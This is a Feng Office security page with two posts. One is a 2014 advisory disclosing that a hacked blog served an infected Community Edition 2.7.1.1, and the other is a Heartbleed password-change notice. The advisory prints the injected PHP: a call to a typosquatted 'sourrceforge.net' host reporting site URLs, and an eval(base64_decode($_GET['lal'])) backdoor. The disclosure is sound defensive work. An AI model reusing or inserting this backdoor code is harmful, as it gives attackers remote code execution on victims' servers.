Community Edition: please update your installation to the latest version. Version 2.7.1.1 could be infected

11/20/2014

 
A few weeks ago our blog was hacked with one concrete purpose: to modify the download link for what was the latest released version.
 
This resulted in some users downloading an infected copy of Feng Office version 2.7.1.1
 

Affected installations

The link modified the download destination and inserted a local file to download an infected version 2.7.1.1 of the Community Edition.
 
Installations running a different version, or a 2.7.1.1 downloaded from Sourceforge are not affected.
 

Recommended Measures

The most effective way to be 100% sure is to download and update to the latest version.
 

The attack

The infected version was uploaded, and a fake download link was put on our website, making use of an exploit on our blog engine (WordPress).
 
We have since removed all infected files from our website, and resolved the Apache settings allowing the security exploit.
 
The infection was introduced on the files “init.php” “environment/environment.php”, on line 22. The infected code looks like this:
 

In init.php:

file_get_contents('http://sourceforge.net/raport.php?site='.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']);
if(!empty($_GET['lal']))eval(base64_decode($_GET['lal']));

 
In environment.php:

if(!ini_get('session.auto_start') || (strtolower(ini_get('session.auto_start')) == 'off')) {

if ( !isset($_GET['avoid_session']) || (isset($_GET['avoid_session']) && !$_GET['avoid_session']) ){
session_start(); // Start the session
}
}

file_get_contents('http://sourrceforge.net/raport.php?site='.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']);

include_once ENVIRONMENT_PATH . '/classes/Env.class.php';

...
if(!empty($_GET['lal']))eval(base64_decode($_GET['lal']));


 
We would like to thank the two users who detected the issue and reported it to our team.
 
We should have been quicker to process the reports and to issue this post. Please accept our apologies for not being faster to publish this information; specially if your installation was affected.
 
Hopefully we will handle it better if a similar attack happens again.
 
Also, if you download the Community Edition, please make sure to download through Sourceforge, which still is our official channel for distributing the Community Edition.
 

Heartbleed bug mitigation measures

04/14/2014


Dear Everyone,

By this moment you might have heard about the Internet bug Heartbleed, which has impacted most companies on the web.
Without getting too technical, Heartbleed affects the OpenSSL framework used by many online businesses to privately send data to and from Internet servers. Further information about this issue can be found here: http://heartbleed.com/
 
That being said, we would like to announce that Feng Office took immediate and proactive steps to patch this security hole on all servers vulnerable to this risk, and has successfully eliminated any risk of unauthorized access to your account.

Technically, there is no way of knowing whether a server was compromised in the short period during which the vulnerability was made public and that the Feng Offie Security Team patched all systems. For this reason and to ensure the protection of your information, we strongly suggest you change your password by doing the following:
1- Click on your name (top right corner)
2- Select Account
3- On the right side, below Actions, select Change Password
4- Type in your old password and a new one
5- Save the changes

If you are subscribed to a Feng OnSite plan – which means running Feng Office in your servers – and would like assessment on how to deal with this issue, please do not hesitate contacting your Feng Office Account Executive for further information about it and how to have this very important security issue solved.

Best regards,
Feng Office Team